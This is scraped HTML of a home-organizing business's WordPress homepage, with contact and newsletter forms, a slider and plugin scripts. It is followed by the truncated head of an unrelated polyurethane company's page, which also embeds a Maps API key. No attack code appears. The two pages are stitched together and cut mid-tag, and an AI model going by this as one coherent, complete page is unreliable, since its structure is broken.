class="wpcf7-form" novalidate="novalidate"> <div style="display: none;"> <input type="hidden" name="_wpcf7" value="2433" /> <input type="hidden" name="_wpcf7_version" value="5.1.1" /> <input type="hidden" name="_wpcf7_locale" value="en_US" /> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f2433-o1" /> <input type="hidden" name="_wpcf7_container_post" value="0" /> <input type="hidden" name="g-recaptcha-response" value="" /> </div> <div class="form_intro"><img src="https://d2xu5rov9xeppt.cloudfront.net/sorted/House/Web/SG-HouseIcon-Gray-SML.png"> <p>You can reach me by email at: <br/><a href="mailto:[email protected]">[email protected]</a><br><br /> Or send me a message here!</div> <hr class="divide"> <p>Your Name (required)<br /> <span class="wpcf7-form-control-wrap your-name"><input type="text" name="your-name" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" aria-required="true" aria-invalid="false" /></span> </p> <p>Your Email (required)<br /> <span class="wpcf7-form-control-wrap your-email"><input type="email" name="your-email" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email" aria-required="true" aria-invalid="false" /></span> </p> <p><span id="wpcf7-5cdd8cb7a2e25" class="wpcf7-form-control-wrap username-363-wrap" style="display:none !important; visibility:hidden !important;"><label class="hp-message">Please leave this field empty.</label><input class="wpcf7-form-control wpcf7-text" type="text" name="username-363" value="" size="40" tabindex="-1" autocomplete="nope" /></span></p> <p>City (required)<br /> <span class="wpcf7-form-control-wrap your-city"><input type="text" name="your-city" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" aria-required="true" aria-invalid="false" /></span> </p> <p>In person or virtual?<br /> <span class="wpcf7-form-control-wrap in-person"><select name="in-person" class="wpcf7-form-control wpcf7-select wpcf7-validates-as-required" aria-required="true" aria-invalid="false"><option value="In Person">In Person</option><option value="Virtual">Virtual</option></select></span></p> <p>Tell me about your project:<br /> <span class="wpcf7-form-control-wrap your-project"><textarea name="your-project" cols="40" rows="10" class="wpcf7-form-control wpcf7-textarea wpcf7-validates-as-required" aria-required="true" aria-invalid="false"></textarea></span> </p> <p class="form_submit"><input type="submit" value="Send" class="wpcf7-form-control wpcf7-submit color-btn" /></p> <div class="wpcf7-response-output wpcf7-display-none"></div></form></div></div> </div><!-- end Modal Window --> </div> </header> <div class="container"> </div><!--closes opening container tag from header so you can have full-width backgrounds on the homepage --> <div class="container page-header-row"> <div class="row tagline"> <div class="col-sm-12 text-center"> <h4>YOUR LIFE WILL BE BETTER WITH LESS.<br>I’LL SHOW YOU HOW.</h4> </div> </div> </div> <section id="home-slider"> <div class="container"> <div class="row"> <div class="col-sm-12"> <div class='mailmunch-forms-before-post' style='display: none !important;'></div><input class="jpibfi" type="hidden"><div style="width: 100%;" class="ml-slider-3-12-1 metaslider metaslider-flex metaslider-2900 ml-slider nav-hidden"> <style type="text/css" id="metaslider-css-2900"> #metaslider_2900.flexslider .slides li {margin-right: 3px !important;} </style> <div id="metaslider_container_2900"> <div id="metaslider_2900"> <ul class="slides"> <li style="display: none; width: 100%;" class="slide-6792 ms-image"><img width="800" height="1200" src="https://shiragill.com/wp-content/uploads/2018/12/this.jpg" class="slider-2900 slide-6792" alt="" rel="" title="this" srcset="https://shiragill.com/wp-content/uploads/2018/12/this.jpg 800w, https://shiragill.com/wp-content/uploads/2018/12/this-500x750.jpg 500w, https://shiragill.com/wp-content/uploads/2018/12/this-200x300.jpg 200w, https://shiragill.com/wp-content/uploads/2018/12/this-768x1152.jpg 768w, https://shiragill.com/wp-content/uploads/2018/12/this-683x1024.jpg 683w, https://shiragill.com/wp-content/uploads/2018/12/this-528x792.jpg 528w" sizes="(max-width: 800px) 100vw, 800px" /></li> <li style="display: none; width: 100%;" class="slide-5657 ms-image"><img width="800" height="1200" src="https://shiragill.com/wp-content/uploads/2019/02/Custom-Package.jpg" class="slider-2900 slide-5657" alt="" rel="" title="Custom Package" srcset="https://shiragill.com/wp-content/uploads/2019/02/Custom-Package.jpg 800w, https://shiragill.com/wp-content/uploads/2019/02/Custom-Package-200x300.jpg 200w, https://shiragill.com/wp-content/uploads/2019/02/Custom-Package-768x1152.jpg 768w, https://shiragill.com/wp-content/uploads/2019/02/Custom-Package-683x1024.jpg 683w, https://shiragill.com/wp-content/uploads/2019/02/Custom-Package-528x792.jpg 528w" sizes="(max-width: 800px) 100vw, 800px" /></li> <li style="display: none; width: 100%;" class="slide-5668 ms-image"><img width="800" height="1200" src="https://shiragill.com/wp-content/uploads/2018/09/0K1A6504.jpg" class="slider-2900 slide-5668" alt="" rel="" title="0K1A6504" srcset="https://shiragill.com/wp-content/uploads/2018/09/0K1A6504.jpg 800w, https://shiragill.com/wp-content/uploads/2018/09/0K1A6504-500x750.jpg 500w, https://shiragill.com/wp-content/uploads/2018/09/0K1A6504-200x300.jpg 200w, https://shiragill.com/wp-content/uploads/2018/09/0K1A6504-768x1152.jpg 768w, https://shiragill.com/wp-content/uploads/2018/09/0K1A6504-683x1024.jpg 683w, https://shiragill.com/wp-content/uploads/2018/09/0K1A6504-528x792.jpg 528w" sizes="(max-width: 800px) 100vw, 800px" /></li> <li style="display: none; width: 100%;" class="slide-5669 ms-image"><img width="1280" height="1920" src="https://shiragill.com/wp-content/uploads/2018/04/In-person-1a.jpg" class="slider-2900 slide-5669" alt="WORK WITH SHIRA IN PERSON" rel="" title="In person 1a" srcset="https://shiragill.com/wp-content/uploads/2018/04/In-person-1a.jpg 1280w, https://shiragill.com/wp-content/uploads/2018/04/In-person-1a-500x750.jpg 500w, https://shiragill.com/wp-content/uploads/2018/04/In-person-1a-528x792.jpg 528w, https://shiragill.com/wp-content/uploads/2018/04/In-person-1a-200x300.jpg 200w, https://shiragill.com/wp-content/uploads/2018/04/In-person-1a-768x1152.jpg 768w, https://shiragill.com/wp-content/uploads/2018/04/In-person-1a-683x1024.jpg 683w, https://shiragill.com/wp-content/uploads/2018/04/In-person-1a-800x1200.jpg 800w" sizes="(max-width: 1280px) 100vw, 1280px" /></li> <li style="display: none; width: 100%;" class="slide-2997 ms-image"><img width="1280" height="1920" src="https://shiragill.com/wp-content/uploads/2016/12/shira_bathroom-remodel_003.jpg" class="slider-2900 slide-2997" alt="" rel="" title="" srcset="https://shiragill.com/wp-content/uploads/2016/12/shira_bathroom-remodel_003.jpg 1280w, https://shiragill.com/wp-content/uploads/2016/12/shira_bathroom-remodel_003-200x300.jpg 200w, https://shiragill.com/wp-content/uploads/2016/12/shira_bathroom-remodel_003-768x1152.jpg 768w, https://shiragill.com/wp-content/uploads/2016/12/shira_bathroom-remodel_003-683x1024.jpg 683w, https://shiragill.com/wp-content/uploads/2016/12/shira_bathroom-remodel_003-800x1200.jpg 800w" sizes="(max-width: 1280px) 100vw, 1280px" /></li> <li style="display: none; width: 100%;" class="slide-5670 ms-image"><img width="800" height="1200" src="https://shiragill.com/wp-content/uploads/2018/10/Right.jpg" class="slider-2900 slide-5670" alt="" rel="" title="Right" srcset="https://shiragill.com/wp-content/uploads/2018/10/Right.jpg 800w, https://shiragill.com/wp-content/uploads/2018/10/Right-500x750.jpg 500w, https://shiragill.com/wp-content/uploads/2018/10/Right-200x300.jpg 200w, https://shiragill.com/wp-content/uploads/2018/10/Right-768x1152.jpg 768w, https://shiragill.com/wp-content/uploads/2018/10/Right-683x1024.jpg 683w, https://shiragill.com/wp-content/uploads/2018/10/Right-528x792.jpg 528w" sizes="(max-width: 800px) 100vw, 800px" /></li> <li style="display: none; width: 100%;" class="slide-5684 ms-image"><img width="1280" height="1920" src="https://shiragill.com/wp-content/uploads/2018/05/Playroom-Slide-h2.jpg" class="slider-2900 slide-5684" alt="" rel="" title="Playroom Slide h2" srcset="https://shiragill.com/wp-content/uploads/2018/05/Playroom-Slide-h2.jpg 1280w, https://shiragill.com/wp-content/uploads/2018/05/Playroom-Slide-h2-500x750.jpg 500w, https://shiragill.com/wp-content/uploads/2018/05/Playroom-Slide-h2-200x300.jpg 200w, https://shiragill.com/wp-content/uploads/2018/05/Playroom-Slide-h2-768x1152.jpg 768w, https://shiragill.com/wp-content/uploads/2018/05/Playroom-Slide-h2-683x1024.jpg 683w, https://shiragill.com/wp-content/uploads/2018/05/Playroom-Slide-h2-800x1200.jpg 800w, https://shiragill.com/wp-content/uploads/2018/05/Playroom-Slide-h2-528x792.jpg 528w" sizes="(max-width: 1280px) 100vw, 1280px" /></li> <li style="display: none; width: 100%;" class="slide-5692 ms-image"><img width="1280" height="1920" src="https://shiragill.com/wp-content/uploads/2018/05/0K1A3506-copy.jpg" class="slider-2900 slide-5692" alt="" rel="" title="0K1A3506 copy" srcset="https://shiragill.com/wp-content/uploads/2018/05/0K1A3506-copy.jpg 1280w, https://shiragill.com/wp-content/uploads/2018/05/0K1A3506-copy-500x750.jpg 500w, https://shiragill.com/wp-content/uploads/2018/05/0K1A3506-copy-200x300.jpg 200w, https://shiragill.com/wp-content/uploads/2018/05/0K1A3506-copy-768x1152.jpg 768w, https://shiragill.com/wp-content/uploads/2018/05/0K1A3506-copy-683x1024.jpg 683w, https://shiragill.com/wp-content/uploads/2018/05/0K1A3506-copy-800x1200.jpg 800w, https://shiragill.com/wp-content/uploads/2018/05/0K1A3506-copy-528x792.jpg 528w" sizes="(max-width: 1280px) 100vw, 1280px" /></li> <li style="display: none; width: 100%;" class="slide-5688 ms-image"><img width="1280" height="1920" src="https://shiragill.com/wp-content/uploads/2018/05/SG-Girls-Closet-After-2-copy.jpg" class="slider-2900 slide-5688" alt="" rel="" title="SG Girls Closet After 2 copy" srcset="https://shiragill.com/wp-content/uploads/2018/05/SG-Girls-Closet-After-2-copy.jpg 1280w, https://shiragill.com/wp-content/uploads/2018/05/SG-Girls-Closet-After-2-copy-500x750.jpg 500w, https://shiragill.com/wp-content/uploads/2018/05/SG-Girls-Closet-After-2-copy-200x300.jpg 200w, https://shiragill.com/wp-content/uploads/2018/05/SG-Girls-Closet-After-2-copy-768x1152.jpg 768w, https://shiragill.com/wp-content/uploads/2018/05/SG-Girls-Closet-After-2-copy-683x1024.jpg 683w, https://shiragill.com/wp-content/uploads/2018/05/SG-Girls-Closet-After-2-copy-800x1200.jpg 800w, https://shiragill.com/wp-content/uploads/2018/05/SG-Girls-Closet-After-2-copy-528x792.jpg 528w" sizes="(max-width: 1280px) 100vw, 1280px" /></li> </ul> </div> </div> </div> </p><div class='mailmunch-forms-in-post-middle' style='display: none !important;'></div><div class='mailmunch-forms-after-post' style='display: none !important;'></div> </div> </div> </div> </section> <section class="featured-partners"> <div class="container-fluid"> <div class="row"> <div class="col-xs-4 col-sm-2 col-md-1 recent-feats"> <p>As<br> Seen<br> On</p> </div> <div class="col-xs-4 col-sm-2 col-md-1 feat-logo"> <p class="centered-feat-logo"><img src="http://shiragill.com/wp-content/uploads/2017/10/Parents-logo2.png" alt="Parents Magazine Logo"></p> </div> <div class="col-xs-4 col-sm-2 col-md-1 feat-logo"> <p class="centered-feat-logo"><img src="http://shiragill.com/wp-content/uploads/2017/10/apartment-therapy2.png" alt="Apartment Therapy Logo"></p> </div> <div class="col-xs-4 col-sm-3 col-md-2 feat-logo-bump"> <p class="centered-feat-logo"><img class="goop" src="https://shiragill.com/wp-content/uploads/2019/01/goop-150.png" alt="Goop Logo."></p> </div> <div class="col-xs-4 col-sm-2 col-md-1 feat-logo-big-bump"> <p class="centered-feat-logo"><img src="https://shiragill.com/wp-content/uploads/2018/12/Real_Simple.png" alt="Real Simple Logo"></p> </div> <div class="tablet-only"> <div class="feat-clear"></div> </div> <div class="col-xs-4 col-sm-4 col-md-2 feat-logo feat-logo2"> <p class="centered-feat-logo"><img src="http://shiragill.com/wp-content/uploads/2017/10/SFChronicleLogo2.png" alt="SF Chronicle Logo"></p> </div> <div class="col-xs-4 col-sm-2 col-md-1 feat-logo feat-logo2"> <p class="centered-feat-logo"><img src="http://shiragill.com/wp-content/uploads/2017/10/sunset_logo2.png" alt="Sunset Magazine Logo"></p> </div> <div class="col-xs-3 col-sm-2 col-md-1 feat-logo feat-logo2"> <p class="centered-feat-logo"><img src="http://shiragill.com/wp-content/uploads/2017/10/cmagazine2.png" alt="C Magazine Logo"></p> </div> <div class="col-xs-5 col-sm-4 col-md-2 feat-logo feat-logo2"> <p class="centered-feat-logo"><img src="http://shiragill.com/wp-content/uploads/2017/10/whowhatwear2.png" alt="Who What Wear Logo"></p> </div> </div> </div> </section> <section class="home-info-section"> <div class="container"> <div class="row"> <div class="col-sm-8 col-sm-offset-2"> <p>&nbsp;</p> <p style="text-align: center;">You know how clutter is negatively affecting your life. <strong><em>I know how to get to the root cause and fix it.</em> </strong></p> <p style="text-align: center;">Anyone can learn how to edit and organize their home. <strong><em>Yes, even you.</em> </strong></p> <p style="text-align: center;">Your dream home is within reach. <em><strong>All you have to do is start. </strong></em></p> <h4> </h4> <h4 style="text-align: center;">Streamline your space, simplify your life.</h4> </div> </div> </div> </section> <section class="optin-panel"> <div class="container"> <div class="row"> <div class="col-sm-6 optin-image"> <div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/306591038" style="position:absolute;left:0;top:0;width:100%;height:100%;" frameborder="0" allowfullscreen></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> <p class="text-center"><img class="optin-play" src="https://shiragill.com/wp-content/uploads/2018/12/pressplay-up.png" alt="Press Play"></p> </div><!-- col-sm-4 --> <div class="col-sm-6 optin-content"> <h2>GET MY QUICK-START 5-MINUTE MAKEOVER IN YOUR INBOX, STAT!</h2> <h5></h5> <div class="form-here"> <!-- Begin MailChimp Signup Form --> <form action="//shiragill.us14.list-manage.com/subscribe/post?u=518d484fe5f9a572cf5305954&amp;id=428c60f44c" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" novalidate> <!-- <label for="mce-FNAME">First Name </label> --> <input type="text" value="" name="FNAME" class="optin-info" id="mce-FNAME" placeholder="Name"> <!-- <label for="mce-EMAIL">Email Address</label> --> <input type="email" value="" name="EMAIL" class="required email optin-info" id="mce-EMAIL" placeholder="Email"> <div id="mce-responses" class="clear"> <div class="response" id="mce-error-response" style="display:none"></div> <div class="response" id="mce-success-response" style="display:none"></div> </div> <!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups--> <div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_518d484fe5f9a572cf5305954_428c60f44c" tabindex="-1" value=""></div> <input type="submit" value="Get the Guide!" name="subscribe" id="mc-embedded-subscribe" class="form-signup"> </form> </div> <p>**When you opt in you’ll also get my weekly organizing + lifestyle tips delivered to your inbox. I’ll never share or sell your information and you can unsubscribe at any time.**</p> </div><!-- col-sm-7 --> </div> </div> </section> <section class="social"> <div class="container"> <div class="row"> <div class="col-sm-4 col-sm-offset-4"> <h4>Let's connect:</h4> <h4><a href="http://www.facebook.com/pages/Shira-Gill-Simply-Sorted/112523645432126?ref=ts" target="_blank"><i class="social-item fa fa-facebook"></i></a> <a href="http://pinterest.com/shiragill/" target="_blank"><i class="social-item fa fa-pinterest-p"></i></a> <a href="http://www.yelp.com/biz/shira-gill-berkeley" target="_blank"><i class="social-item fa fa-yelp"></i></a> <a href="https://www.instagram.com/shiragill/" target="_blank"><i class="social-item fa fa-instagram"></i></a></h4> </div> </div> </div> </section> <section class="ig-grid"> <div class="container"> <div class="row"> <div class="col-sm-8 col-sm-offset-2"> <div class="screen-only"><div id="sb_instagram" class="sbi sbi_mob_col_auto sbi_col_6" style="width:100%; padding-bottom: 10px; " data-id="557817267" data-num="6" data-res="auto" data-cols="6" data-options='{&quot;sortby&quot;: &quot;none&quot;, &quot;showbio&quot;: &quot;false&quot;,&quot;feedID&quot;: &quot;557817267&quot;, &quot;headercolor&quot;: &quot;&quot;, &quot;imagepadding&quot;: &quot;5&quot;,&quot;mid&quot;: &quot;M2E4MWE5Zg==&quot;, &quot;disablecache&quot;: &quot;false&quot;, &quot;sbiCacheExists&quot;: &quot;true&quot;,&quot;callback&quot;: &quot;ZjIzMmU0NDQ0ZWEyN.GRlYjk3MGFmZGI3NmQ2YmZlYTk=&quot;, &quot;sbiHeaderCache&quot;: &quot;true&quot;}'><div id="sbi_images" style="padding: 5px;"><div class="sbi_loader"></div></div><div id="sbi_load" class="sbi_hidden"></div></div></div> </div> </div> <div class="row"> <div class="col-sm-6 col-sm-offset-3"> <h4>Streamline your space, simplify your life.</h4> </div> </div> </div> </section> </div><!--closes container div--> <footer class="footer"> <div class="container"> <div class="row"> <div class="col-sm-7"> <p class="footer-content">&copy; 2019 Shira Gill Home | <a href="https://shiragill.com/photo-credits">Credits</a> | <a href="/terms-of-use/">Terms of Use</a> | <a href="/privacy-policy/">Privacy Policy</a> | <a href="https://shiragill.com/login/?redirect_to=https%3A%2F%2Fshiragill.com%2F">Login</a> </p> </div> <div class="col-sm-5"> <p class="contact footer-content">Contact me at <a href="mailto:[email protected]">[email protected]</a></p> <img src="https://shiragill.com/wp-content/uploads/2018/08/houseicon.png"> </div> </div> </div> </footer> </div> <!-- Instagram Feed JS --> <script type="text/javascript"> var sbiajaxurl = "https://shiragill.com/wp-admin/admin-ajax.php"; </script> <div style="display:none"> </div> <link rel='stylesheet' id='metaslider-flex-slider-css' href='https://shiragill.com/wp-content/plugins/ml-slider/assets/sliders/flexslider/flexslider.css' type='text/css' media='all' property='stylesheet' /> <link rel='stylesheet' id='metaslider-public-css' href='https://shiragill.com/wp-content/plugins/ml-slider/assets/metaslider/public.css' type='text/css' media='all' property='stylesheet' /> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/shiragill.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://shiragill.com/wp-content/plugins/contact-form-7/includes/js/scripts.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var cnArgs = {"ajaxurl":"https:\/\/shiragill.com\/wp-admin\/admin-ajax.php","hideEffect":"fade","onScroll":"no","onScrollOffset":"100","cookieName":"cookie_notice_accepted","cookieValue":"true","cookieTime":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"","refuse":"no","revoke_cookies":"0","revoke_cookies_opt":"automatic","secure":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://shiragill.com/wp-content/plugins/cookie-notice/js/front.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var sb_instagram_js_options = {"sb_instagram_at":"","font_method":"svg"}; /* ]]> */ </script> <script type='text/javascript' src='https://shiragill.com/wp-content/plugins/instagram-feed/js/sb-instagram.min.js'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var jpibfi_options = {"hover":{"siteTitle":"Shira Gill Home","image_selector":".jpibfi_container img","disabled_classes":"wp-smiley;nopin","enabled_classes":"","min_image_height":0,"min_image_height_small":0,"min_image_width":0,"min_image_width_small":0,"show_on":"[front],[home],[single],[page],[archive],[search],[category]","disable_on":",6584,6648,6649,6754,6755,6772,6776,6777,6779,6780,6781,6783,6784,6786,7164,5485,7165,7184,7193,7200,7202,7209,7211,7215,7357,7363,7366,7368,7369","show_button":"hover","button_margin_bottom":20,"button_margin_top":20,"button_margin_left":20,"button_margin_right":20,"button_position":"top-left","description_option":["img_title","img_alt","post_title","post_excerpt"],"transparency_value":0.2,"pin_image":"default","pin_image_button":"round","pin_image_icon":"circle","pin_image_size":"normal","custom_image_url":"","scale_pin_image":false,"pin_linked_url":true,"pinLinkedImages":true,"pinImageHeight":54,"pinImageWidth":54,"scroll_selector":"","support_srcset":false}}; /* ]]> */ </script> <script type='text/javascript' src='https://shiragill.com/wp-content/plugins/jquery-pin-it-button-for-images/js/jpibfi.client.js'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://shiragill.com/wp-content/plugins/jetpack/modules/wpgroho.js'></script> <script type='text/javascript' src='https://shiragill.com/wp-content/plugins/easy-fancybox/js/jquery.fancybox.1.3.23.min.js'></script> <script type='text/javascript'> var fb_timeout, fb_opts={'overlayShow':true,'hideOnOverlayClick':true,'showCloseButton':true,'width':400,'height':425,'padding':0,'margin':20,'centerOnScroll':true,'enableEscapeButton':false,'autoScale':true }; if(typeof easy_fancybox_handler==='undefined'){ var easy_fancybox_handler=function(){ jQuery('.nofancybox,a.wp-block-file__button,a.pin-it-button,a[href*="pinterest.com/pin/create"],a[href*="facebook.com/share"],a[href*="twitter.com/share"]').addClass('nolightbox'); /* Inline */ jQuery('a.fancybox-inline,area.fancybox-inline,li.fancybox-inline a').each(function(){jQuery(this).fancybox(jQuery.extend({},fb_opts,{'type':'inline','autoDimensions':true,'scrolling':'no','easingIn':'easeOutBack','easingOut':'easeInBack','opacity':false,'hideOnContentClick':false,'titleShow':false}))});}; jQuery('a.fancybox-close').on('click',function(e){e.preventDefault();jQuery.fancybox.close()}); }; var easy_fancybox_auto=function(){setTimeout(function(){jQuery('#fancybox-auto').trigger('click')},1000);}; jQuery(easy_fancybox_handler);jQuery(document).on('post-load',easy_fancybox_handler); jQuery(easy_fancybox_auto); </script> <script type='text/javascript' src='https://shiragill.com/wp-content/plugins/easy-fancybox/js/jquery.mousewheel.3.1.13.min.js'></script> <script type='text/javascript' src='https://shiragill.com/wp-content/themes/SimplySorted/library/js/jquery.bxslider.min.js'></script> <script type='text/javascript' src='https://shiragill.com/wp-content/themes/SimplySorted/library/js/scripts.js'></script> <script type='text/javascript' src='https://shiragill.com/wp-includes/js/wp-embed.js'></script> <script type='text/javascript' src='https://shiragill.com/wp-content/plugins/ml-slider/assets/sliders/flexslider/jquery.flexslider.min.js'></script> <script type='text/javascript'> var metaslider_2900 = function($) {$('#metaslider_2900').addClass('flexslider'); $('#metaslider_2900').flexslider({ slideshowSpeed:5000, animation:'slide', controlNav:false, directionNav:true, pauseOnHover:true, direction:'horizontal', reverse:false, animationSpeed:1200, prevText:"&lt;", nextText:"&gt;", fadeFirstSlide:true, easing:"linear", slideshow:true, itemWidth:380, minItems:1, itemMargin:3 }); $(document).trigger('metaslider/initialized', '#metaslider_2900'); }; var timer_metaslider_2900 = function() { var slider = !window.jQuery ? window.setTimeout(timer_metaslider_2900, 100) : !jQuery.isReady ? window.setTimeout(timer_metaslider_2900, 1) : metaslider_2900(window.jQuery); }; timer_metaslider_2900(); </script> <script type='text/javascript' src='https://shiragill.com/wp-content/plugins/ml-slider/assets/easing/jQuery.easing.min.js'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.2.1',blog:'45713445',post:'4117',tz:'-7',srv:'shiragill.com'} ]); _stq.push([ 'clickTrackerInit', '45713445', '4117' ]); </script> <div id="cookie-notice" role="banner" class="cn-bottom wp-default" style="color: #fff; background-color: #f1d5d2;"><div class="cookie-notice-container"><span id="cn-notice-text">We use cookies to ensure that we give you the best user experience. If you continue to use this site, you consent to the use of our cookies. </span><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button wp-default button">Ok</a> </div> </div> <!-------MODAL----------> <div class="modal fade" id="myModal"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">&times;</span><span class="sr-only">Close</span></button> <h3 class="modal-title" id="myModalLabel">YAY, I’D LOVE FOR YOU TO JOIN US!</h3> </div><!-- modal-header --> <div class="modal-body"> <p class="modal-message">Get on the waitlist and you'll get first dibs and some bonus goodies as soon as we open registration for the next virtual program.</p> <!-- Begin MailChimp Signup Form --> <form action="https://shiragill.us14.list-manage.com/subscribe/post?u=518d484fe5f9a572cf5305954&amp;id=1f91acd145" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate> <!-- <label for="mce-FNAME">First Name </label> --> <input type="text" value="" name="FNAME" class="optin-info" id="mce-FNAME" placeholder="Name"> <!-- <label for="mce-EMAIL">Email Address</label> --> <input type="email" value="" name="EMAIL" class="required email optin-info" id="mce-EMAIL" placeholder="Email"> <div id="mce-responses" class="clear"> <div class="response" id="mce-error-response" style="display:none"></div> <div class="response" id="mce-success-response" style="display:none"></div> </div> <!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups--> <div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_518d484fe5f9a572cf5305954_428c60f44c" tabindex="-1" value=""></div> <input type="submit" value="Put Me on the Waitlist!" name="subscribe" id="mc-embedded-subscribe" class="form-signup fancybox-inline btn btn-success"> </form> <!--End mc_embed_signup--> </div><!-- modal-body --> </div><!-- modal-content --> </div><!-- modal-dialog --> </div><!-- myModal --> <!--------BOOTSTRAP CORE JAVASCRIPT----------> <script src="https://shiragill.com/wp-content/themes/SimplySorted/library/js/bootstrap.min.js"></script> </body> </html> <!-- end of site. what a ride! -->
0
<!doctype html> <!--[if lt IE 10]> <html class="ie9 no-js grve-responsive" lang="en-US"> <![endif]--> <!--[if (gt IE 9)|!(IE)]><!--> <html class="no-js grve-responsive" lang="en-US"> <!--<![endif]--> <head> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script> <link href="https://fonts.googleapis.com/css?family=Raleway:100,300,400,500,700,900|Roboto:100,300,400,500,700" rel="stylesheet"> <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous"> <script type="text/javascript"> $( window ).load(function() { $(".polyButton").mouseover( function(){ $(".polyButton > a > img").attr("src","/wp-content/uploads/2017/02/button_polyurethanes1.png"); $(".polyButton > a > img").attr("srcset",""); }); $(".polyButton").mouseout( function(){ $(".polyButton > a > img").attr("src","/wp-content/uploads/2017/02/button_polyurethanes2.png"); $(".polyButton > a > img").attr("srcset",""); }); $(".polyButton2").mouseover( function(){ $(".polyButton2 > a > img").attr("src","/wp-content/uploads/button_polyurethanes1.png"); $(".polyButton2 > a > img").attr("srcset",""); }); $(".polyButton2").mouseout( function(){ $(".polyButton2 > a > img").attr("src","/wp-content/uploads/button_polyurethanes2.png"); $(".polyButton2 > a > img").attr("srcset",""); }); $(".newsButton").mouseover( function(){ $(".newsButton> a > img").attr("src","/wp-content/uploads/2017/02/button_news1.png"); $(".newsButton> a > img").attr("srcset",""); }); $(".newsButton").mouseout( function(){ $(".newsButton> a > img").attr("src","/wp-content/uploads/2017/02/button_news2.png"); $(".newsButton> a > img").attr("srcset",""); }); $(".scienceButton").mouseover( function(){ $(".scienceButton> a > img").attr("src","/wp-content/uploads/2017/02/button_science1.png"); $(".scienceButton> a > img").attr("srcset",""); }); $(".scienceButton").mouseout( function(){ $(".scienceButton> a > img").attr("src","/wp-content/uploads/2017/02/button_science2.png"); $(".scienceButton> a > img").attr("srcset",""); }); $(".rbButton").mouseover( function(){ $(".rbButton> a > img").attr("src","/wp-content/uploads/2017/02/button_RecycledRubber1.png"); $(".rbButton> a > img").attr("srcset",""); }); $(".rbButton").mouseout( function(){ $(".rbButton> a > img").attr("src","/wp-content/uploads/2017/02/button_RecycledRubber2.png"); $(".rbButton> a > img").attr("srcset",""); }); $(".leadershipButton").mouseover( function(){ $(".leadershipButton> a > img").attr("src","/wp-content/uploads/2017/02/button_leadershipteam1.png"); $(".leadershipButton> a > img").attr("srcset",""); }); $(".leadershipButton").mouseout( function(){ $(".leadershipButton> a > img").attr("src","/wp-content/uploads/2017/02/button_leadershipteam2.png"); $(".leadershipButton> a > img").attr("srcset",""); }); $(".sustainabilityButton").mouseover( function(){ $(".sustainabilityButton> a > img").attr("src","/wp-content/uploads/2017/02/button_sustainability1.png"); $(".sustainabilityButton> a > img").attr("srcset",""); }); $(".sustainabilityButton").mouseout( function(){ $(".sustainabilityButton> a > img").attr("src","/wp-content/uploads/2017/02/button_sustainability2.png"); $(".sustainabilityButton> a > img").attr("srcset",""); }); $(".companyButton").mouseover( function(){ $(".companyButton> a > img").attr("src","/wp-content/uploads/2017/02/button_ourcompany1.png"); $(".companyButton> a > img").attr("srcset",""); }); $(".companyButton").mouseout( function(){ $(".companyButton> a > img").attr("src","/wp-content/uploads/2017/02/button_ourcompany2.png"); $(".companyButton> a > img").attr("srcset",""); }); }); </script> <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyBlA7xmySdZCaZ1eE_fALswQu6AGR7szXI&callback=initMap" async defer></script> <meta charset="UTF-8"> <!-- viewport --> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"> <!-- allow pinned sites --> <meta name="application-name" content="Accella Polyurethane Systems" /> <link href="/wp-content/uploads/2017/01/favicon.png" rel="icon" type="image/x-icon"> <link rel="pingback" href="https://accellacorp.com/xmlrpc.php"> <title>Accella Polyurethane Systems</title> <!-- This site is optimized with the Yoast SEO plugin v11.2.1 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="http://accellacorp.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Accella Polyurethane Systems" /> <meta property="og:url" content="http://accellacorp.com/" /> <meta property="og:site_name" content="Accella Polyurethane Systems" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:title" content="Accella Polyurethane Systems" /> <script type='application/ld+json' class='yoast-schema-graph 